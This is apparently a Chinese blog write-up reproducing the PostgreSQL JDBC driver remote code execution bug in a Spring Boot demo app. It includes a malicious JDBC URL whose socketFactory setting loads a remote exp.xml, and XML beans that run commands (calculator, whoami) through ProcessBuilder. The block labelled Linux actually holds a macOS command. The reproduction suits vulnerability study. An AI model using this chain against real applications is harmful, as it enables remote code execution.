PostgreSQL JDBC Driver RCE复现

Scroll Down

PostgreSQL JDBC Driver RCE复现

复现过程

参考https://mp.weixin.qq.com/s/jb7mbPWdMp1vlgF8F1mshg

使用Demo环境:

https://github.com/jirkapinkas/spring-boot-postgresql-docker-compose/

下载下来,拖进IDEA即可。

新建SpringJdbcTemplate2PostgreSqlApplication类:

image20220225163244311.png

代码:

package com.example;

import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.boot.CommandLineRunner;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.jdbc.core.JdbcTemplate;

@SpringBootApplication
public class SpringJdbcTemplate2PostgreSqlApplication implements CommandLineRunner {

    @Autowired
    private JdbcTemplate jdbcTemplate;

    public static void main(String[] args) {
        SpringApplication.run(SpringJdbcTemplate2PostgreSqlApplication.class, args);
    }

    @Override
    public void run(String... args) throws Exception {
        String sql = "INSERT INTO students (name, email) VALUES ("
                + "'Nam Ha Minh', 'nam@codejava.net')";

        int rows = jdbcTemplate.update(sql);
        if (rows > 0) {
            System.out.println("A new row has been inserted.");
        }
    }

}

application.properties配置文件:

spring.datasource.url=jdbc:postgresql://192.168.91.15:5432/postgres?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://192.168.91.1:8888/exp.xml
spring.datasource.username=postgres
spring.datasource.password=postgresql

spring.jpa.hibernate.ddl-auto=create

exp.xml (Linux版本)


<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>/bin/bash</value>
        <value>-cc</value>
        <value>open /System/Applications/Calculator.app</value>
      </list>
    </constructor-arg>
  </bean>
</beans>

exp.xml(Windows版本)

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>cmd</value>
        <value>/c</value>
        <value>whoami</value>
      </list>
    </constructor-arg>
  </bean>
</beans>

一切就绪后,运行SpringJdbcTemplate2PostgreSqlApplication的main方法。即可弹出计算器。

image20220225163825920.png

漏洞分析

看看Skay大佬的分析就行了!